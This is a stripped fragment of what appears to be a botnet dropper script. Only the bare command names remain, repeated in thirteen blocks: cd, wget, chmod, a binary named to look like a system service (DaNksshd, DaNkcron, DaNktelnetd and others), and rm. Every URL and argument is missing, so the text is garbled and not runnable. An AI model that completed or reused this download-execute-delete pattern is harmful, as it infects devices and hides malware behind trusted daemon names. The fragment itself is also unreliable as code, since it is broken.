cd
cd
cd
cd
cd
wget
chmod
DaNkntpd
rm
cd
cd
cd
cd
cd
wget
chmod
DaNksshd
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkbash
rm
cd
cd
cd
cd
cd
wget
chmod
DaNktftp
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkwget
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkcron
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkftp
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkpftp
rm
cd
cd
cd
cd
cd
wget
chmod
DaNksh
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkshit
rm
cd
cd
cd
cd
cd
wget
chmod
DaNkapache2
rm
cd
cd
cd
cd
cd
wget
chmod
DaNktelnetd
rm
